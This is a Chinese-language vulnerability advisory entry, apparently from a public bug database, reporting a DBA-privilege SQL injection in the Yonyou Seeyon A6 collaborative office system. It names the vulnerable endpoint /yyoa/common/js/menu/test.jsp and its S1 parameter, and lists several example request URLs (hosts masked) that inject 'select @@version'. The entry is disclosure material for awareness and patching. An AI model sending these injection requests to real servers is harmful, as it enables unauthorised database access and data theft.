用友致远A6协同办公系统存在一处DBA权限SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: RT ### 详细说明: 搜索了一下, 没有被提交 漏洞位于:/yyoa/common/js/menu/test.jsp 文件中S1 参数 案例 ``` http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version **.**.**.**:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version http://**.**.**.**/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@version ``` 更多案例 可参照http://**.**.**.**/bugs/wooyun-2015-0105038 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201511/25232331ae0747854ae60d3dc743659765070276.png" alt="QQ20151125-3@2x.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/25232331ae0747854ae60d3dc743659765070276.png) [<img src="https://images.seebug.org/upload/201511/25232346b1c091cfface04fc1cacec9eb4427ceb.png"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息